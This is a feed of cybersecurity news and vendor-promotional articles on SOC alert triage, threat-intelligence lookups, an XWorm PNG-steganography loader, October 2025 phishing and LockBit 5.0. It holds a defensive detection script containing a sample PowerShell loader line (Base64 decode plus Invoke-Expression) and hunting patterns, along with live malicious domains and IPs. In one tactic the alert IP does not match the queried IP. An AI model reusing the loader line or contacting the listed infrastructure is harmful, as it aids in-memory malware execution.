Balaji N, Author at Cyber Security News (https://cybersecuritynews.com/author/balaji/), World's #1 Premier Cybersecurity and Hacking News Portal. Feed last updated Wed, 19 Nov 2025 18:42:36 +0000.

How to Solve Alert Overload in Your SOC
https://cybersecuritynews.com/how-to-solve-alert-overload-in-your-soc/
Wed, 19 Nov 2025 18:42:30 +0000

The post How to Solve Alert Overload in Your SOC  appeared first on Cyber Security News.

Your SOC generates thousands of alerts daily. Many of them are low-priority, repetitive, or false positives. On paper, this looks like a technical problem. In reality, it’s a business problem. 

Every Alert Costs 

When analysts are buried under thousands of notifications, they spend more time triaging noise than responding to real incidents. The result: slower reaction times, missed threats, staff burnout, and ballooning operational costs. 

Every wasted minute translates into a weaker security posture, potential financial loss, and reduced return on your security investments. Alert overload doesn’t just impact your SOC. 

It slows down your entire organization’s ability to respond, recover, and produce revenue.  

What Doesn’t Work 

Organizations often try to tackle alert overload by: 

  • Hiring more analysts — which increases headcount costs but doesn’t reduce the noise. 
  • Relying on strict filtering rules — which risks missing critical alerts. 
  • Adding more tools — which only multiplies data sources and dashboards. 
  • Automating without context — which accelerates the wrong decisions. 

These approaches attack the symptoms, not the cause: the lack of context around alerts. Without understanding what triggered an alert and how relevant it is, teams will always be stuck firefighting instead of investigating. 

What Works: Context Powered by Threat Intelligence 

The sustainable way to overcome alert overload is to improve alert quality through contextual threat intelligence.

When analysts can instantly enrich alerts with reliable, up-to-date data on IOCs, malware families, and infrastructure, they can prioritize faster and make confident decisions. 

This is where ANY.RUN’s Threat Intelligence Lookup comes in — a solution designed to balance the speed of investigation with data completeness, freshness, and accuracy. 

It helps teams quickly understand whether an alert is linked to a known threat, how serious it is, and whether it requires escalation. The outcome: fewer false positives, faster triage, and more efficient use of human and financial resources. 

TI Lookup: click the search bar to choose parameters 

Threat Intelligence Lookup delivers instant context for IOCs, domains, IPs, hashes, and other artifacts. The data is sourced from 15,000+ SOC environments and millions of malware analysis sessions in ANY.RUN’s Interactive Sandbox, constantly refreshed to reflect real-time global threat activity. 

Benefits for analysts: 

  • Immediate access to verified IOC data — no need to switch between platforms. 
  • Clear visual indicators of threat relevance and relationships. 
  • Faster, more accurate triage decisions. 

Benefits for business: 

  • Lower operational costs by reducing wasted analyst hours. 
  • Improved detection-to-response ratio, strengthening security ROI. 
  • More predictable and measurable SOC performance. 

Try TI Lookup and discover how faster triage turns into measurable cost savings -> Contact ANY.RUN to get 50 trial lookups

How It Works 

Here is an example of how security teams use TI Lookup to streamline their alert workflows and decision-making. 

Suppose analysts receive an alert on a suspicious domain. TI Lookup provides an instant verdict on the potential indicator along with contextual data:  

domainName:"databap.mom"

Domain search results: malicious label, linked IOCs, sandbox analyses 

A quick lookup later, your team understands:

  • The domain is an indicator of malicious activity;
  • It is associated with the dangerous Lumma stealer;
  • Lumma now targets US and Europe;
  • It has been detected in recent campaigns;
  • It can be used to harvest additional IOCs;
  • There are sandbox analyses of malware samples featuring this domain, which let analysts understand the threat's behavior and TTPs.

From Overload to Efficiency and Profitability 

When your SOC operates with context-rich data, the entire detection and response cycle accelerates. Analysts stop wasting time on noise. Decision-making becomes data-driven, not reactive. 

That directly translates to measurable business value: 

  • Reduced mean time to detect (MTTD) and respond (MTTR). 
  • Better analyst productivity without expanding the team. 
  • Tangible cost savings from automation that works with — not against — human intelligence. 

In short, eliminating alert overload isn’t just about comfort for the SOC team. It’s a strategic financial decision that strengthens resilience, reduces risk exposure, and safeguards your bottom line. 

Conclusion 

Alert overload can’t be solved by more people or more tools — only by smarter data.

By empowering your SOC with contextual threat intelligence from ANY.RUN’s Threat Intelligence Lookup, you transform chaos into clarity, alerts into insights, and effort into measurable value. 

Accelerate response, control costs, and maximize your team’s performance with TI Lookup. --> Start your trial today.  

New Wave of Steganography Attacks: Hackers Hiding XWorm in PNGs
https://cybersecuritynews.com/steganography-attacks-xworm-in-pngs/
Thu, 13 Nov 2025 18:06:08 +0000
ANY.RUN experts recently uncovered a new XWorm campaign that uses steganography to conceal malicious payloads inside seemingly harmless PNG images.

What appears to be an ordinary graphic actually contains encrypted loaders that execute entirely in memory, allowing the malware to bypass most traditional detection methods and signature-based defenses. 

Let’s break down how this attack works and what analysts and hunters should look for. 

Attack Overview with Real-World Example 

The infection starts with a malicious JavaScript installer named PurchaseOrder_25005092.JS, delivered through phishing emails and web pages (T1566.001). 

The script is obfuscated using an Immediately Invoked Function Expression (IIFE) pattern (T1027) and writes three staged files to: C:\Users\PUBLIC\  

These files are named:  

  • Kile.cmd  
  • Vile.png  
  • Mands.png  

While the .png extension suggests images, these are not image files. Instead, they act as storage containers for Base64-encoded and AES-encrypted payloads (T1036.008); a common trick to avoid quick signature-based detection. 

You can view the full attack chain and download an actionable analysis report from a real-world run inside ANY.RUN's interactive sandbox.

View Recent Attack Hiding XWorm in PNG 

Steganography attack discovered inside ANY.RUN sandbox 

See every stage of execution unfold in seconds, extract IOCs automatically, and transform hidden malware behavior into clear, shareable insights. 

Get 14-Day Trial of ANY.RUN 

Execution Chain Breakdown: What Analysts Need to Know 

Below is a concise, step-by-step breakdown of the execution chain to help analysts quickly identify key artifacts and pivot points.

Follow each stage to see where to hunt, which logs to inspect, and which indicators to extract for detection and response. 

Persistence and setup 

The JavaScript creates a scheduled task (T1053.005) to maintain persistence after reboot. It checks for required artifacts and recreates them using long Base64 blobs and AES-encrypted strings (T1027.013). 

Obfuscated batch staging (Kile.cmd) 

Kile.cmd contains heavy obfuscation: variable noise, percent-substitutions, and chunked Base64 fragments. At runtime it reassembles commands and launches the PowerShell loader (T1059). 

Two-stage PowerShell loader 

Stage 1 – Command runner: Reads Mands.png, Base64-decodes and AES-decrypts it, then decodes the contained commands and executes them via Invoke-Expression (IEX). 

Stage 2 – In-memory assembly loader: Reads Vile.png, Base64-decodes and AES-decrypts it to raw bytes, then loads a .NET assembly directly into memory and invokes its entry point (T1620).

The combined result is a fileless, in-memory loader that launches XWorm.

XWorm execution chain with hidden PNG 

Pro Threat Hunting Tips: Detecting Fileless and Steganographic Loaders 

Below is a focused checklist for analysts and hunters to identify steganography-backed, in-memory loaders like XWorm. Use these steps to spot unusual patterns early and validate findings through behavioral analysis:  

  1. Inspect image files: Scan .png and .jpg files for unusually long Base64 strings, text chunks, or non-image data. High text-to-binary ratios or embedded AES-encrypted sections often indicate hidden payloads.
  2. Monitor PowerShell activity: Track commands using Invoke-Expression, FromBase64String, or AES routines. Correlate these with script origins like wscript.exe or .cmd files to spot reflective execution and in-memory loaders.
  3. Correlate scheduled task creation: Look for tasks created by JavaScript or batch scripts from user directories rather than system paths. Such entries often indicate persistence after initial compromise.
  4. Use dynamic analysis: Static scans miss many steganographic loaders. Run suspicious scripts and files in an interactive sandbox like ANY.RUN to observe decryption, staging, and memory execution in real time, and extract IOCs from each stage.
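The first three checklist items can be expressed as concrete detection logic. The script below is an added example written for this article, not ANY.RUN's own tooling: it runs three checks over constructed sample data and flags the patterns the checklist describes. The file contents, the EDR-style event fields (`parent`, `parent_image`, `cmd`), and the task names are assumptions made for the example.

```python
"""Constructed, offline triage helpers for the hunting checklist above.

Three checks, one per checklist item:
  1. image files that are not images (wrong magic bytes, long Base64 runs,
     text-only bodies),
  2. PowerShell script-block events that combine Invoke-Expression,
     FromBase64String, AES classes or reflective assembly loading with a
     script-host parent process,
  3. scheduled-task creation launched from a script host out of a user
     directory.
All sample data below is constructed for the example, not real telemetry.
"""
import base64
import re

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8"

# Constructed: one genuine PNG header, and one ".png" that is only Base64 text,
# mirroring the Vile.png / Mands.png container trick described in the article.
SAMPLE_FILES = {
    "logo.png": PNG_MAGIC + b"\x00\x00\x00\rIHDR" + bytes(40),
    "Vile.png": base64.b64encode(b"A" * 600),
}

B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def classify_image_file(name: str, data: bytes) -> dict:
    """Flag a file whose extension says 'image' but whose bytes say otherwise."""
    findings = []
    looks_like_image = data.startswith(PNG_MAGIC) or data.startswith(JPEG_MAGIC)
    if name.lower().endswith((".png", ".jpg", ".jpeg")) and not looks_like_image:
        findings.append("extension/magic-bytes mismatch")
    if B64_RUN.search(data):
        findings.append("Base64 run of 200+ characters")
    # Ratio of printable ASCII to total bytes: real images are mostly binary.
    printable = sum(1 for b in data if 32 <= b < 127 or b in b"\r\n\t")
    ratio = printable / max(len(data), 1)
    if len(data) > 256 and ratio > 0.95:
        findings.append("text-only body (%.2f printable)" % ratio)
    return {"file": name, "suspicious": bool(findings), "findings": findings}


# Constructed script-block events; "parent" is a hypothetical EDR field.
SAMPLE_EVENTS = [
    {"parent": "wscript.exe",
     "script": "$b=[IO.File]::ReadAllText('C:\\Users\\PUBLIC\\Mands.png');"
               "$d=[Convert]::FromBase64String($b);Invoke-Expression $d"},
    {"parent": "explorer.exe",
     "script": "Get-ChildItem C:\\Temp | Where-Object Length -gt 1MB"},
    {"parent": "cmd.exe",
     "script": "$a=New-Object System.Security.Cryptography.AesManaged;"
               "[Reflection.Assembly]::Load($bytes)"},
]

PS_INDICATORS = {
    "invoke_expression": re.compile(r"\b(Invoke-Expression|IEX)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "aes_class": re.compile(r"(AesManaged|AesCryptoServiceProvider|CreateDecryptor)", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "public_dir": re.compile(r"C:\\Users\\PUBLIC\\", re.I),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}


def score_event(event: dict) -> dict:
    """Count loader indicators; weight them higher under a script-host parent."""
    hits = [name for name, rx in PS_INDICATORS.items() if rx.search(event["script"])]
    score = len(hits)
    if hits and event["parent"].lower() in SCRIPT_HOSTS:
        score += 2
        hits.append("script-host parent: " + event["parent"])
    return {"parent": event["parent"], "score": score, "hits": hits, "alert": score >= 3}


# Constructed process-creation events for schtasks; task names are made up.
SAMPLE_TASK_EVENTS = [
    {"parent_image": "C:\\Windows\\System32\\wscript.exe",
     "cmd": "schtasks.exe /Create /TN ExampleTask /TR C:\\Users\\PUBLIC\\Kile.cmd"},
    {"parent_image": "C:\\Windows\\System32\\svchost.exe",
     "cmd": "schtasks.exe /Create /TN VendorUpdate /TR \"C:\\Program Files\\Vendor\\update.exe\""},
]


def flag_scheduled_task(event: dict) -> bool:
    """True when a script host creates a task whose action lives under C:\\Users."""
    cmd = event["cmd"].lower()
    if "schtasks" not in cmd or "/create" not in cmd:
        return False
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    return parent in SCRIPT_HOSTS and "\\users\\" in cmd


if __name__ == "__main__":
    for name, data in SAMPLE_FILES.items():
        print(classify_image_file(name, data))
    for ev in SAMPLE_EVENTS:
        print(score_event(ev))
    for ev in SAMPLE_TASK_EVENTS:
        print(flag_scheduled_task(ev))
```

The scoring deliberately requires either several indicators or one indicator plus a script-host parent before it alerts, so routine administrative PowerShell run from explorer.exe stays quiet; in production the thresholds and the parent-process allowlist would be tuned against the environment's baseline.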

How a Sandbox Speeds Up Detection in Steganographic Attacks 

Steganographic loaders like XWorm rely on multi-stage execution and memory-only payloads, which makes them nearly invisible to static scanners.

A sandbox environment changes that by showing what's actually happening under the surface: file writes, decryption routines, and PowerShell commands executed in real time.

With ANY.RUN’s interactive sandbox, analysts can: 

  • Watch the full chain unfold, from the initial JavaScript dropper to in-memory execution.
  • Extract and visualize IOCs such as decoded scripts, file paths, and registry modifications. 
  • Confirm persistence and C2 activity without waiting for signatures or EDR alerts. 

This level of visibility turns a stealthy, fileless infection into a transparent, traceable process, helping threat hunters respond faster and with evidence-based clarity. 

Turn Complex Attacks into Clear Evidence in Seconds 

Attackers are getting better at blending in; the only reliable defense is to observe their behavior, not just their dropped files.

In nearly 90% of cases, ANY.RUN reveals full attack behavior in under 60 seconds, turning fleeting, fileless activity into concrete evidence analysts can act on immediately. 

Key benefits for analysts & threat hunters: 

  • Real-time visibility for faster decisions: Instantly see how loaders unpack, decrypt, and execute without waiting for static scans or vendor signatures. 
  • Fewer false positives: Behavioral context makes it easy to distinguish real threats from benign automation or scripts. 
  • End-to-end understanding: Watch how each process connects, what files are written, and how persistence is achieved. 
  • Time savings in triage and investigation: Complete analysis and IOC extraction in minutes, not hours. 
  • Seamless workflow integration: Push results directly to SIEM, SOAR, or case management tools through ready-made connectors. 
  • Collaboration made easy: Share live sessions, findings, and visual reports across teams for quicker consensus. 
  • Continuous learning and hunting: Mapped MITRE ATT&CK TTPs and decoded artifacts enrich detection logic and threat intelligence feeds. 

Ready to see it in action? Talk to ANY.RUN experts and discover how interactive analysis helps your team find and stop threats static tools miss.

ThreatBook Peer-Recognized as a Strong Performer in the 2025 Gartner® Peer Insights™ Voice of the Customer for Network Detection and Response — for the Third Consecutive Year
https://cybersecuritynews.com/threatbook-peer-recognized-as-a-strong-performer-in-the-2025-gartner/
Thu, 13 Nov 2025 02:18:01 +0000
Recognition we believe underscores global customer trust and proven product excellence for security teams evaluating NDR solutions.

ThreatBook, a global leader in threat intelligence-based cybersecurity solutions, today announced that for its Threat Detection Platform (TDP), it has been recognized as a Strong Performer in the 2025 Gartner Peer Insights Voice of the Customer for Network Detection and Response (NDR).

This marks the third consecutive year that ThreatBook has received this distinction, which we believe underscores consistent customer satisfaction, product innovation, and operational excellence.

According to Gartner: “‘Voice of the Customer’ is a document that synthesizes Gartner Peer Insights reviews into insights for buyers of technology and services. This aggregated peer perspective, along with the individual detailed reviews, is complementary to Gartner expert research and can play a key role in your buying process. Peers are verified reviewers of a technology product or service, who not only rate the offering, but also provide valuable feedback to consider before making a purchase decision.”

“We’re thrilled to be recognized again as a Strong Performer in the Gartner Peer Insights ‘Voice of the Customer’ for NDR,” said Mr. Feng XUE, Chief Executive Officer of ThreatBook. “Our mission is to empower security teams with visibility and precision, especially in the Asia-Pacific region where attacks are becoming more sophisticated and targeted. We believe, this recognition reflects our customers’ trust in ThreatBook TDP’s ability to deliver real detection accuracy and operational resilience.”

Recognition Driven by Real-World Customer Feedback

To be included in the report, vendors must meet stringent inclusion criteria and are positioned within four quadrants based on user interest, product experience, and overall satisfaction — covering areas such as product capabilities, support, and delivery.

According to the research: “in the network detection and response market, Gartner Peer Insights published 1,263 reviews and ratings during the consideration period,” with 11 vendors ultimately meeting the inclusion standards. ThreatBook is among the few vendors recognized as a Strong Performer for three consecutive years. ThreatBook was among the few vendors to meet the full inclusion criteria and achieved 100% of customers willing to recommend ThreatBook TDP, based on 43 overall verified reviews submitted as of Aug 2025.

Enterprise users from finance, manufacturing, energy, services, and retail sectors across Asia-Pacific, North America, the Middle East, and Europe contributed feedback that rated ThreatBook TDP highly in overall product experience, detection precision, and operational efficiency.

TDP: Industry Leading Intelligence-Driven Detection and Response

As the market leader in China’s threat intelligence sector (iResearch, 2024 China Threat Intelligence Industry Development Report), ThreatBook integrates high-fidelity threat intelligence into its detection and response solutions.

ThreatBook TDP is a full-traffic, intelligence-driven NDR platform designed to provide visibility, context, and actionability at scale.

Key strengths include:

High-Precision Detection – Built on ThreatBook’s proprietary global and APAC threat intelligence, TDP achieves industry-leading detection accuracy for targeted and advanced attacks.

Operational Readiness – Automatically maps enterprise attack surfaces and reconstructs attack chains from an adversarial perspective for proactive defense.

Closed-Loop Response – Integrates with a broad ecosystem of security tools, supporting automated blocking and orchestration with 99% effectiveness.

User-Focused Experience – Offers an intuitive interface and multi-dimensional analytics to enhance SOC efficiency and decision-making.

Proven Across Industries and Regions

Today, ThreatBook TDP is deployed in thousands of leading enterprises across critical industries including finance, energy, power, internet, and smart manufacturing.

It has become a core detection and response system for enterprise and government SOCs, helping them achieve visibility, precision, and proactive defense in dynamic threat environments.

Full review: https://www.gartner.com/reviews/market/network-detection-and-response/vendor/threatbook/product/threatbook-tdp-ndr/review/view/6146934

Full review: https://www.gartner.com/reviews/market/network-detection-and-response/vendor/threatbook/product/threatbook-tdp-ndr/review/view/6145510

Gartner, Voice of the Customer for Network Detection and Response, 30 October 2025

* Disclaimer: GARTNER and PEER INSIGHTS are registered trademarks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved. Gartner Peer Insights content consists of the opinions of individual end users based on their own experiences, and should not be construed as statements of fact, nor do they represent the views of Gartner or its affiliates. Gartner does not endorse any vendor, product or service depicted in this content nor makes any warranties, expressed or implied, with respect to this content, about its accuracy or completeness, including any warranties of merchantability or fitness for a particular purpose.

About ThreatBook

ThreatBook is a global cybersecurity company specializing in advanced threat intelligence, detection, and response. Founded in 2015, ThreatBook equips enterprises, governments, and service providers with the clarity and context needed to defend against evolving digital risks.

By combining artificial intelligence with deep threat intelligence, ThreatBook delivers real-time visibility, hyper-accurate detections, and early-warning insights against nation-state actors, cybercriminal groups, and emerging attack campaigns. 

With unique vantage points from across the Asia Pacific region and beyond, ThreatBook provides intelligence coverage that bridges Eastern and Western threat landscapes, offering an unmatched perspective for global defenders.

ThreatBook: Act with Intelligence that Matters. To learn more, visit www.threatbook.io or follow us on LinkedIn.

Contact

Belmont Communications
ThreatBook
threatbook@belmontcomms.co

Why Your Business Needs Live Threat Intel from 15k SOCs
https://cybersecuritynews.com/why-your-business-needs-live-threat-intel-from-15k-socs/
Wed, 12 Nov 2025 15:07:17 +0000
Cybersecurity leaders now face an impossible equation: you need intelligence that’s comprehensive enough to protect your organisation, fresh enough to stop emerging threats, and manageable enough that your team doesn’t drown in false positives.

Most solutions force you to choose. Some prove you don’t have to. 

The Intelligence Paradox: Too Much and Never Enough 

Every CISO knows the struggle. Deploy too few threat feeds, and you’re flying blind, missing critical indicators that could prevent the next breach.

Deploy too many, and your SOC analysts spend their days buried in alerts, chasing false positives, and burning out before they can focus on genuine threats. 

This isn’t just an operational headache. It’s a business risk. When analysts are overwhelmed, response times slow. When threat data arrives too late, attackers have already moved.

When intelligence lacks context, your team wastes hours investigating benign activity while real threats slip through undetected. 

The balance seems impossible: you need data that’s simultaneously comprehensive and curated, real-time and actionable, detailed and digestible.  

Business Resilience Happens When Context Meets Speed 

ANY.RUN's Threat Intelligence Feeds are built around one key principle: quality feeds don't just add data — they transform how your entire cybersecurity operation functions.

Think of them as your early warning system, your threat hunting compass, and your analyst productivity accelerator rolled into one. 

ANY.RUN's TI Feeds: data sources, features, benefits

Or, to put it another way, imagine combining a microscope with a telegraph. One gives you perfect detail; the other gives you instant transmission. Individually useful, but together? Transformative.

But enough with metaphors. ANY.RUN's TI Feeds solve the data paradox.
Powered by data from over 15,000 SOCs and researchers using ANY.RUN’s interactive malware sandbox, the feeds deliver live intelligence on real attacks happening right now. Each record is backed by behavioral analysis and real-world evidence. 

Build resilience with live, contextual intelligence from 15K teams -> Request your TI Feeds trial 

This combination of context and freshness is critical for decision-makers. It means your analysts don’t waste time chasing false positives or outdated data. They can prioritize real threats, act early, and protect the organization’s assets before risk turns into loss. 

The feeds integrate seamlessly with your SIEM, EDR, firewall, and other security tools, automatically enriching alerts with context and enabling automated response workflows.

They shift your posture from reactive to proactive, allowing you to block threats before they reach your network rather than scrambling after the breach. 

For MSSPs managing security across multiple clients, feeds become even more critical. They enable you to scale protection without scaling headcount proportionally, applying lessons learned from one customer’s threat landscape to protect all others instantly. 

Why Context Matters for Your Bottom Line 

Context transforms raw data into actionable intelligence. When your SIEM flags a suspicious IP address, generic feeds tell you “this is malicious.” 

ANY.RUN’s feeds tell you how it’s malicious, what malware family it’s associated with, which attack techniques it employs, and what IOCs you should look for across your environment. 

For security teams, this means: 

  • Faster triage: Analysts immediately understand threat severity and scope; 
  • Accurate prioritization: Distinguish between critical incidents and low-risk events; 
  • Effective response: Know exactly which containment measures to deploy; 
  • Reduced burnout: Spend time hunting real threats, not chasing shadows. 

For business leaders, context transforms into: 

  • Lower operational costs: Less time wasted on false positives means better ROI on your security investment; 
  • Faster time-to-resolution: Contextual intelligence accelerates incident response from hours to minutes; 
  • Informed decision-making: Understand your actual risk exposure, not just a list of scary-sounding indicators. 

When your intelligence reflects the experience of 15,000 SOCs worldwide, you’re no longer reacting in isolation — you’re part of a collective defense network. 

Why Freshness Is Non-Negotiable 

Threat actors evolve their techniques daily, launching new campaigns, rotating infrastructure, and modifying malware to evade detection. 

ANY.RUN’s TI Feeds deliver intelligence with up-to-the-minute freshness because they’re derived from live analysis happening right now — as security teams worldwide investigate active threats using ANY.RUN’s Interactive Sandbox. 

This real-time advantage means: 

  • Proactive blocking: Stop emerging threats before they become widespread; 
  • Reduced dwell time: Detect active compromises faster with the latest IOCs; 
  • Instant awareness: Gain visibility into novel attack techniques as they emerge; 
  • Competitive protection: Access intelligence that attackers haven’t yet adapted to evade. 

For MSSPs, this freshness is a competitive differentiator. You can promise clients protection against threats that other providers won’t detect for days—because by the time those threats appear in slower feeds, you’ve already blocked them. 

Make your next security decision data-driven and turn live threat data into strategic advantage -> Start your trial of ANY.RUN's TI Feeds

TI Feeds: Business Objectives Met 

ANY.RUN’s Threat Intelligence Feeds deliver business value across multiple dimensions: 

  • Real-World Threat Visibility: You’re receiving data about actual incidents and attacks that are impacting other companies right now. The threats currently investigated by 15,000 SOCs using ANY.RUN’s Interactive Sandbox.  
  • Cost-Effective Scale: ANY.RUN’s Feeds give you enterprise-grade intelligence without enterprise-level overhead.  
  • Regulatory Compliance and Due Diligence: Demonstrate to auditors, board members, and customers that you’re using current, comprehensive threat intelligence.  
  • Improved Detection Rates: Enrich your existing security tools with high-fidelity indicators that dramatically reduce false negatives. Catch threats that generic signature-based detection misses. 
  • Accelerated Incident Response: When a threat is detected, contextual intelligence means your team already knows the attack chain, associated IOCs, and effective countermeasures.  
  • Strategic Planning Support: Aggregate intelligence helps security leaders identify trends, understand your industry’s threat landscape, and make informed decisions about security investments and priorities. 
  • Reduced Analyst Fatigue: Analysts spend time doing interesting, meaningful work instead of drowning in noise. 
  • Interoperability: The feeds integrate seamlessly with your existing security infrastructure: SIEM platforms, threat intelligence platforms, EDR solutions, firewalls, and more.  

Conclusion 

Cyber resilience isn’t about having more data — it’s about having the right data at the right moment. ANY.RUN’s Threat Intelligence Feeds provide exactly that: live, contextual insights from real incidents across the globe.

They help organizations cut through noise, reduce uncertainty, and make every security decision count. 

October Sees Rise in Phishing and Ransomware Attacks, Including TyKit and Google Careers Scams
https://cybersecuritynews.com/rise-in-phishing-and-ransomware-attacks/
Wed, 05 Nov 2025 17:42:15 +0000
October 2025 marked a notable escalation in cyber threats, with phishing campaigns and ransomware variants exploiting trusted cloud services to target corporate credentials and critical infrastructure.

Attackers increasingly abused platforms like Google, Figma, and ClickUp for credential theft, while LockBit’s latest iteration extended its reach to virtualized environments.

These incidents, analyzed by cybersecurity firms such as ANY.RUN, underscore the need for behavioral detection beyond static indicators.

Sophisticated Phishing Leverages Legitimate Platforms

Phishing attacks in October heavily relied on legitimate services to evade traditional filters, starting with a campaign mimicking Google Careers job offers.

Emails lured victims with fake application pages, routing through Salesforce redirects and Cloudflare Turnstile CAPTCHAs before harvesting credentials via domains like satoshicommands.com.

This multi-step attack chain targeted tech and consulting sectors, exploiting brand trust to enable account takeovers and data exfiltration.

Similarly, Figma's public prototypes became a vector for Microsoft-themed phishing, where shared "document" invites led to fake login pages; see the attack analysis.

Groups like Storm-1747 drove nearly half of these attacks, using Figma's trusted domain to embed interactive lures that bypassed email security. Victims encountered CAPTCHAs and redirects to credential-stealing sites, often linked to operators such as Mamba.

ClickUp faced abuse as a redirector, with phishing emails directing users to doc.clickup.com, then hopping to Microsoft microdomains and Azure Blob Storage for final payload delivery. This chain mimicked collaboration traffic, making it hard for whitelists to flag, and resulted in widespread credential compromises.

A standout development was TyKit, a reusable phishing kit first spotted in May 2025 but peaking in October. It hid obfuscated JavaScript in SVG files, using eval functions and Base64 encoding to redirect users to Microsoft 365 impersonators.

Affecting finance, government, and telecom across multiple regions, TyKit employed anti-debugging and staged C2 checks for evasion, leading to hundreds of account thefts via AitM techniques.

Ransomware Targets Diverse Operating Systems

LockBit 5.0 emerged as a cross-platform threat on the ransomware front, celebrating the group’s sixth anniversary by expanding beyond Windows to Linux and VMware ESXi.

The variant features enhanced obfuscation, DLL reflection, and anti-analysis routines, allowing rapid encryption of virtual machines and datastores.

This enabled affiliates to disrupt entire data centers, with randomized extensions and log clearing complicating response efforts.

The ESXi build was particularly alarming, targeting hypervisors to encrypt multiple VMs simultaneously, while Linux and Windows versions included region-based restrictions and service terminations.

Attacks hit enterprises in Europe, North America, and Asia, amplifying downtime and financial losses through shared infrastructure tactics.

Security teams must prioritize sandbox detonation for SVG and redirect analysis, as static tools miss these behaviors. Implementing phishing-resistant MFA, monitoring for suspicious domains like segy.zip or hire.gworkmatch.com, and integrating threat intelligence feeds can mitigate risks.

Regular backups, VPN-enforced access, and behavioral monitoring in sandboxes like ANY.RUN’s reduce mean time to response, turning isolated indicators into proactive rules. As attackers refine cloud abuse, organizations should rehearse playbooks to counter the next surge.

Catch attacks early with instant IOC enrichment and interactive sandbox => Try Now

The post October Sees Rise in Phishing and Ransomware Attacks, Including TyKit and Google Careers Scams appeared first on Cyber Security News.

Beat Threats with Context: 5 Actionable Tactics for SOC Analysts https://cybersecuritynews.com/beat-threats-with-context-5-actionable-tactics-for-soc-analysts/ Wed, 05 Nov 2025 04:35:50 +0000

Security teams drown in alerts but starve for insight. Blocklists catch the obvious. SIEM correlation gives clues. But only context reveals what an alert really means, and what you should do about it. 

Every SOC sees thousands of signals: odd domains, masquerading binaries, strange persistence artifacts. On their own, these indicators mean almost nothing. A suspicious process might be malware or a legitimate update from a vendor you barely know. 

But the moment you add threat context — history, connected IOCs, malware family relations, sandbox behavior — the picture changes completely. 

Meet TI Lookup: The Context Engine 

ANY.RUN Threat Intelligence Lookup is a real-time investigation tool that lets analysts instantly understand what they’re dealing with — from domains and IPs to file hashes and URLs. 

It’s powered by rich data crowdsourced from 15,000+ SOCs and researchers worldwide, continuously enriched by ANY.RUN’s sandbox detections. Instead of wasting time digging through multiple feeds, analysts get actionable context in seconds. 

TI Lookup: query an IOC, get actionable intelligence for quick decision 

You achieve:  

  • Instant clarity: Quickly identify whether an IOC is malicious, suspicious, or benign; 
  • Deeper context: View sandbox behavior, relations, and threat actor links in one place; 
  • Smarter triage: Speed up incident response with verified data and fewer false positives. 

Context turns data into decisions. And decisions stop breaches from happening. 

Here are five highly practical ways SOC analysts use context to speed triage, reduce noise, and fight more effectively, all powered by ANY.RUN’s Threat Intelligence (TI) Lookup. 

Tactic 1: Domain Intelligence – From Suspicious to Confirmed Threat 

The Alert: 

Domain contacted: logrecovery[.]com 

Without Context: Could be a legitimate cybersecurity resource. Requires manual investigation across multiple platforms. 

With TI Context: 

  • Observed in AsyncRAT and Amadey sandbox executions; 
  • Linked to active command-and-control infrastructure; 
  • Associated with information-stealing campaigns and botnets. 

domainName:"logrecovery.com" 

Immediate Action: Block the domain at your proxy/firewall, tag it as a high-confidence IOC in your threat intelligence platform, and hunt retroactively for any historical connections in your network traffic logs. 
Why It Matters: Stealer malware exfiltrates credentials, session tokens, and sensitive data. Every minute it remains unblocked is a window for data theft. Context lets you move from “investigate” to “contain” immediately. 

Stop hunting for context, start acting on it. Sign up to trial Threat Intelligence Lookup and see how it works 

Tactic 2: Email Attachment Analysis – Spotting Campaign Patterns 

The Alert:  

Suspicious attachment: Electronic_Receipt 

Without Context: Generic filename. Could be a legitimate invoice or phishing. Requires time-consuming manual analysis. 

With TI Context: 

  • Detected in a number of malware analyses; 
  • Part of credential-harvesting campaigns; 
  • Linked to Tycoon, one of the most dangerous phishing kits. 

filePath:"Electronic_Receipt" 

Malware samples featuring the file pattern 

Immediate Action: Add the file hash to your SIEM blocklist, check egress logs for any systems that may have already connected to associated C2 domains, and update mail gateway filters to catch variants. 

Why It Matters: Tycoon 2FA can intercept user credentials and session cookies to bypass MFA, enabling unauthorized access to accounts even with additional security measures. Organizations using cloud services are at the most risk.

Recognizing campaign patterns helps you understand the scope: is this a targeted attack or part of a broader spray-and-pray operation? Context answers that question instantly.  

Tactic 3: IP Address Intelligence – Understanding Payload Delivery 

The Alert: 

Outbound connection to: 45.155.205[.]11 
Without Context: Could be legitimate software update checks. Requires manual investigation across multiple platforms. 

With TI Context: 

  • Observed in DBatLoader and GuLoader sandbox executions; 
  • Linked to active command-and-control infrastructure; 
  • Associated with information-stealing campaigns. 

destinationIP:"162.241.62.63" 

IP context: malware and campaign associations 
Immediate Action: Block the IP at your proxy/firewall, tag it as a high-confidence IOC in your threat intelligence platform, and hunt retroactively for any historical connections in your network traffic logs. 

Why It Matters: Stealer malware exfiltrates credentials, session tokens, and sensitive data. Every minute it remains unblocked is a window for data theft. Context lets you move from “investigate” to “contain” immediately. 

Tactic 4: Process Behavior – Detecting Credential Theft 

The Alert: 

Unusual process detected: New Text Document mod.exe 

Without Context: Looks like a carelessly named document, but the .exe extension is suspicious. Manual verification required. 

With TI Context: 

  • Observed in XRed backdoor campaigns; 
  • Associated with session hijacking and credential theft; 
  • Tampers with Windows registry, establishes persistence. 

filePath:"New Text Document mod.exe" 

Malware running a similar process 

Immediate Action: Check all endpoints for this process name and file hash, flag any instances for immediate investigation, and monitor for suspicious authentication behavior patterns like impossible travel or unusual access times. 

Malicious process poorly disguised as a document 

Why It Matters: XRed is a backdoor designed for long-term system infiltration, control, and theft of sensitive data. It combines elements of remote access Trojans (RATs), infostealers, and backdoors to execute a range of malicious activities. 

Tactic 5: Registry Key Persistence – Finding the Foothold 

The Alert:  
Registry modification: \Software\Microsoft\update 

Without Context: Registry changes happen constantly. Could be legitimate software, Windows updates, or persistence mechanism. Difficult to prioritize without additional information. 

With TI Context: 

  • Appears in known malware persistence mechanisms 
  • Seen in stealer campaigns 
  • Used to maintain access across system reboots 
